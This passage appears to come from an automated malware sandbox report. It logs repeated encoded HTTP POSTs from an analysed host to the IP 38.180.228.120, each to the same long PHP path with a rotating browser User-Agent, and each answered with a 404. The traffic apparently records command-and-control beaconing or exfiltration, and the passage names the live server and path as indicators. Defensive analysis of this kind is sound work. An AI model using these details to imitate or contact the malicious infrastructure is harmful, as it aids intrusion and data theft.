                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12192.168.2.74998338.180.228.12080
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 18:54:41.150063992 CET450OUTPOST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                  Host: 38.180.228.120
                                                  Content-Length: 336
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:54:41.505825996 CET336OUTData Raw: 05 00 01 05 06 09 04 02 05 06 02 01 02 05 01 05 00 02 05 00 02 01 03 0f 07 00 0d 54 03 04 06 06 0d 55 04 00 00 51 06 0a 0c 07 05 06 06 07 07 52 04 53 0c 0c 0f 0e 04 05 04 53 03 0d 06 52 07 5d 03 06 0a 00 06 03 06 09 0d 07 0f 0f 0f 53 0c 55 02 06
                                                  Data Ascii: TUQRSSR]SUQ\L}RkYb@t[n\afkRRuw|lhMw[y|wK{Y}X|~hNvwhAje~V@xmP~Oy
                                                  Nov 19, 2024 18:54:41.815114975 CET518INHTTP/1.1 100 Continue
                                                  Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 31 39 20 4e 6f 76 20 32 30 32 34 20 31 37 3a 35 34 3a 34 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 36 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c [TRUNCATED]
                                                  Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:54:41 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13192.168.2.74998438.180.228.12080
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 18:54:50.437344074 CET414OUTPOST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:54:50.787081957 CET344OUTData Raw: 00 06 01 02 06 0d 01 02 05 06 02 01 02 07 01 07 00 01 05 00 02 03 03 09 03 04 0d 00 05 07 03 09 0d 0f 03 09 01 54 03 0a 0e 05 07 05 04 07 07 04 04 50 0f 08 0c 07 04 05 07 03 06 54 04 05 07 5d 00 53 0a 00 04 0e 05 05 0e 04 0c 01 0f 00 0c 54 05 04
                                                  Data Ascii: TPT]ST]XU\L}S|cu\`[qbehAhlzYclZMxDoBElYv}}|vg{Zie~V@A{}~~Lu
                                                  Nov 19, 2024 18:54:51.059525967 CET518INHTTP/1.1 100 Continue
                                                  Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 31 39 20 4e 6f 76 20 32 30 32 34 20 31 37 3a 35 34 3a 35 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 36 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c [TRUNCATED]
                                                  Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:54:50 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14192.168.2.74998538.180.228.12080
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 18:55:01.748260975 CET450OUTPOST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:55:02.099694014 CET344OUTData Raw: 05 01 04 07 03 08 01 06 05 06 02 01 02 02 01 0a 00 00 05 0d 02 01 03 0f 02 51 0e 04 05 01 00 00 0a 0f 03 0f 03 54 05 04 0c 03 06 0a 05 0a 05 52 06 01 0b 09 0d 55 06 05 06 02 06 54 06 57 06 0b 02 54 0c 00 00 0e 04 56 0c 00 0e 0f 0f 53 0d 05 07 0d
                                                  Data Ascii: QTRUTWTVSZXV\L~|zN`\b^uvlAk|[Btlps|IycH{YjkSU`YtO~u~V@zmz~bS
                                                  Nov 19, 2024 18:55:02.391093016 CET25INHTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:55:02.525419950 CET493INHTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:55:02 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15192.168.2.74998638.180.228.12080
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 18:55:13.948293924 CET414OUTPOST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:55:14.302742004 CET344OUTData Raw: 05 01 04 07 03 0a 04 01 05 06 02 01 02 06 01 05 00 0b 05 0b 02 06 03 0a 01 07 0d 53 06 05 03 09 0c 0f 05 0b 00 01 06 51 0d 06 05 07 04 05 04 00 05 03 0d 09 0a 03 04 52 04 57 06 0c 07 07 06 0c 01 01 0f 5e 00 0e 01 01 0e 03 0b 00 0d 04 0e 54 02 05
                                                  Data Ascii: SQRW^T\RWU\L}R|}[`an_v[t|Rb]copBh`|ylZZoY}[|m`wg`~u~V@B{SPL}\y
                                                  Nov 19, 2024 18:55:14.567323923 CET25INHTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:55:14.696804047 CET493INHTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:55:14 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16192.168.2.74998738.180.228.12080
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 18:55:24.009685993 CET449OUTPOST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:55:24.365673065 CET344OUTData Raw: 05 01 04 01 03 0a 04 07 05 06 02 01 02 06 01 0a 00 0a 05 00 02 0c 03 0f 01 0e 0d 01 04 50 02 05 0a 0e 05 00 03 00 06 0a 0c 56 02 0a 06 53 04 05 06 01 0b 01 0c 07 06 05 05 0f 05 0d 04 02 05 5a 00 07 0e 0b 05 02 04 02 0c 05 0e 05 0e 07 0f 00 06 54
                                                  Data Ascii: PVSZTP\L~ANrcbyuuSkuLvlZs{_ylZ[zp}YCx`gpj_~V@Bzm\rS
                                                  Nov 19, 2024 18:55:24.637973070 CET25INHTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:55:24.769146919 CET493INHTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:55:24 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17192.168.2.74998838.180.228.12080
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 18:55:34.582887888 CET414OUTPOST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:55:34.927855968 CET344OUTData Raw: 05 05 04 06 03 0d 01 00 05 06 02 01 02 01 01 06 00 0b 05 00 02 06 03 01 00 0f 0d 56 04 57 02 50 0c 00 04 5a 03 05 05 07 0c 01 04 01 00 0b 04 06 07 04 0c 0d 0c 05 06 06 04 07 05 02 04 07 06 0c 03 04 0f 5e 07 51 05 00 0c 03 0e 55 0f 04 0e 53 04 54
                                                  Data Ascii: VWPZ^QUSTPRQ\L~h^y^waia[UUhlXYtBphZ`{dZl`e_|ChNwt|}O~V@{mP}\[
                                                  Nov 19, 2024 18:55:35.236042023 CET25INHTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:55:35.371102095 CET493INHTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:55:35 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18192.168.2.74998938.180.228.12080
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 18:55:46.208605051 CET414OUTPOST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:55:46.552829027 CET344OUTData Raw: 00 06 04 05 06 09 04 01 05 06 02 01 02 00 01 07 00 0a 05 0b 02 07 03 0e 00 06 0d 54 03 06 01 09 0c 01 04 0b 01 07 04 01 0f 04 07 05 07 51 05 55 05 00 0b 0a 0e 06 04 52 07 04 04 54 04 55 06 0c 05 05 0f 5d 05 03 04 04 0e 50 0d 06 0a 05 0e 53 02 0d
                                                  Data Ascii: TQURTU]PSR\L~@|NvN`aqaewRhB[thM~``xlo{b~hctli_~V@{}\L}Li
                                                  Nov 19, 2024 18:55:46.828692913 CET518INHTTP/1.1 100 Continue
                                                  Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 31 39 20 4e 6f 76 20 32 30 32 34 20 31 37 3a 35 35 3a 34 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 36 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c [TRUNCATED]
                                                  Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:55:46 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19192.168.2.74999038.180.228.12080
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 18:55:57.626796007 CET467OUTPOST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:55:57.974956036 CET344OUTData Raw: 00 02 04 05 06 0b 04 05 05 06 02 01 02 01 01 0a 00 03 05 0b 02 0d 03 0c 01 05 0d 04 03 02 01 03 0a 0f 05 08 01 02 05 01 0b 07 05 57 05 51 05 54 03 0a 0f 00 0f 53 04 51 05 06 04 57 04 51 05 5a 02 0a 0e 0b 04 02 07 00 0e 52 0c 01 0d 0c 0e 56 04 0c
                                                  Data Ascii: WQTSQWQZRVRP\L~@k`~vbz]a`hUiLwlYMt{cJ{s}Z|kQ`Iw]i_~V@zmvLba
                                                  Nov 19, 2024 18:55:58.454690933 CET25INHTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:55:58.455607891 CET493INHTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:55:58 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                                                  Nov 19, 2024 18:55:58.455622911 CET493INHTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:55:58 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20192.168.2.74999138.180.228.12080
                                                  TimestampBytes transferredDirectionData
